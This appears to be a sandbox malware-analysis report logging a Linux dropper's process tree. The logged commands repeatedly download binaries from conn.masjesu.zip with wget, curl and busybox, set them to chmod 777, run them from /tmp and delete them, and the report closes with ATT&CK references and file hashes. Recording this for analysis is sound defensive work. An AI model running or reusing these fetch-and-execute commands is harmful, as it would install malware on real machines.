/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb./V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵PID:939
-
-
/bin/chmodchmod 777 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP./BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:941
-
-
/bin/rmrm BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs./W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:953
-
-
/bin/chmodchmod 777 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB./RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:960
-
-
/bin/chmodchmod 777 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe./TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵PID:967
-
-
/bin/chmodchmod 777 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS./1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa./sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- System Network Configuration Discovery
PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:981
-
-
/bin/chmodchmod 777 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb./097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:984
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:985
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:988
-
-
/bin/chmodchmod 777 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7./tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:991
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:992
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:993
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:995
-
-
/bin/chmodchmod 777 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG./59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵PID:998
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97